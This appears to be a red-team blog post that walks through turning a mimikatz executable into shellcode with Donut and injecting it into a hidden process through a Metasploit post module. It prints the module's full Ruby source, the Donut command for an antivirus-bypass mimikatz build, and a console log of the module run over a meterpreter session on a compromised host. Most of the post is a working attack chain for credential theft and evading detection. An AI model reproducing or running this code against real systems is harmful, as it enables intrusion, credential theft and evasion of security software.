RedTeam之使用msf+Donut交互式执行程序

Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) files. 
This shellcode can be injected into an arbitrary Windows process for in-memory execution. Given a supported 
file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent 
shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless
 by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit
 randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased 
  from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for 
  running Assemblies in disposable AppDomains.
It can be used in several ways.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/common'
require 'msf/core/post/windows/reflective_dll_injection'

class MetasploitModule < Msf::Post
  include Msf::Post::Common
  include Msf::Post::Windows::ReflectiveDLLInjection

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Manage Memory Shellcode Injection Module',
      'Description'   => %q{
        This module will inject into the memory of a process a specified shellcode.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'phra <https://iwantmore.pizza>' ],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))

    register_options(
      [
        OptPath.new('SHELLCODE', [true, 'Path to the shellcode to execute']),
        OptInt.new('PID', [false, 'Process Identifier to inject of process to inject the shellcode. (0 = new process)', 0]),
        OptBool.new('CHANNELIZED', [true, 'Retrieve output of the process', true]),
        OptBool.new('INTERACTIVE', [true, 'Interact with the process', true]),
        OptBool.new('HIDDEN', [true, 'Spawn an hidden process', true]),
        OptEnum.new('BITS', [true, 'Set architecture bits', '64', ['32', '64']])
      ])
  end

  # Run Method for when run command is issued
  def run

    # syinfo is only on meterpreter sessions
    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?

    # Set variables
    shellcode = IO.read(datastore['SHELLCODE'])
    pid = datastore['PID']
    bits = datastore['BITS']
    p = nil
    if bits == '64'
      bits = ARCH_X64
    else
      bits = ARCH_X86
    end

    if pid == 0 or not has_pid?(pid)
      p = create_temp_proc(bits)
      print_status("Spawned process #{p.pid}")
    else
      print_status("Opening process #{p.pid}")
      p = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
    end

    if bits == ARCH_X64 and client.arch == ARCH_X86
      print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.")
      print_error("Migrate to an x64 process and try again.")
      return false
    elsif arch_check(bits, p.pid)
      inject(shellcode, p)
    end
  end

  # Checks the Architeture of a Payload and PID are compatible
  # Returns true if they are false if they are not
  def arch_check(bits, pid)
    # get the pid arch
    client.sys.process.processes.each do |p|
      # Check Payload Arch
      if pid == p["pid"]
        print_status("Process found checking Architecture")
        if bits == p['arch']
          print_good("Process is the same architecture as the payload")
          return true
        else
          print_error("The PID #{ p['arch']} and Payload #{bits} architectures are different.")
          return false
        end
      end
    end
  end

  # Creates a temp notepad.exe to inject payload in to given the payload
  # Returns process PID
  def create_temp_proc(bits)
    windir = client.sys.config.getenv('windir')
    # Select path of executable to run depending the architecture
    if bits == ARCH_X86 and client.arch == ARCH_X86
      cmd = "#{windir}\\System32\\notepad.exe"
    elsif bits == ARCH_X64 and client.arch == ARCH_X64
      cmd = "#{windir}\\System32\\notepad.exe"
    elsif bits == ARCH_X64 and client.arch == ARCH_X86
      cmd = "#{windir}\\Sysnative\\notepad.exe"
    elsif bits == ARCH_X86 and client.arch == ARCH_X64
      cmd = "#{windir}\\SysWOW64\\notepad.exe"
    end

    proc = client.sys.process.execute(cmd, nil, {
      'Hidden' => datastore['HIDDEN'],
      'Channelized' => datastore['CHANNELIZED'],
      'Interactive' => datastore['INTERACTIVE']
    })

    return proc
  end

  def inject(shellcode, p)
    print_status("Injecting shellcode into process ID #{p.pid}")
    begin
      print_status("Allocating memory in process #{p.pid}")
      mem = inject_into_process(p, shellcode)
      print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{shellcode.length} byte shellcode")
      p.thread.create(mem, 0)
      print_good("Successfully injected payload into process: #{p.pid}")

      if datastore['INTERACTIVE'] && datastore['CHANNELIZED'] && datastore['PID'] == 0
        print_status("Interacting")
        client.console.interact_with_channel(p.channel)
      elsif datastore['CHANNELIZED']
        print_status("Retrieving output")
        data = p.channel.read
        print_line(data) if data
      end
    rescue ::Exception => e
      print_error("Failed to inject Payload to #{p.pid}!")
      print_error(e.to_s)
    end
  end
end

 ./donut /usr/share/mimikatz/bypass360/mimikatz/sign-katz-x64.exe -a 2 -o /tmp/payload.bin

msf5 exploit(multi/handler) > use post/windows/manage/shellcode_inject 
msf5 post(windows/manage/shellcode_inject) > set shellcode /tmp/payloads.bin
shellcode => /tmp/payloads.bin
msf5 post(windows/manage/shellcode_inject) > set session 5
session => 5
msf5 post(windows/manage/shellcode_inject) > exploit

[*] Running module against DESKTOP-QQF0MLN
[*] Spawned process 1020
[-] You are trying to inject to a x64 process from a x86 version of Meterpreter.
[-] Migrate to an x64 process and try again.
[*] Post module execution completed

msf5 post(windows/manage/shellcode_inject) > show options

Module options (post/windows/manage/shellcode_inject):

   Name         Current Setting    Required  Description
   ----         ---------------    --------  -----------
   BITS         64                 yes       Set architecture bits (Accepted: 32, 64)
   CHANNELIZED  true               yes       Retrieve output of the process
   HIDDEN       true               yes       Spawn an hidden process
   INTERACTIVE  true               yes       Interact with the process
   PID          0                  no        Process Identifier to inject of process to inject the shellcode. (0 = new process)
   SESSION      5                  yes       The session to run this module on.
   SHELLCODE    /tmp/payloads.bin  yes       Path to the shellcode to execute

msf5 post(windows/manage/shellcode_inject) > set bits 32
bits => 32
msf5 post(windows/manage/shellcode_inject) > exploit

https://github.com/TheWover/donut

https://iwantmore.pizza/posts/meterpreter-shellcode-inject.html